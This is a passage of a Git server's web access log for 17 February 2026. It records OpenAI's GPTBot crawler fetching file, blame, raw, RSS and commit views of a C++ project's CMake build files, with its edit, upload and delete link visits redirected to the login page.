"https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12372] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11530] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11587] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11934] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11857] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16268] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11542] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11510] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" -[17/Feb/2026:19:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12345] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10617] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 9911] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 9908] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10560] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 9913] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11379] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:19:41:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 1073] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 9907] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 10523] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:19:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9925] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 449] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:41:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 1067] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11441] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:41:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:41:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 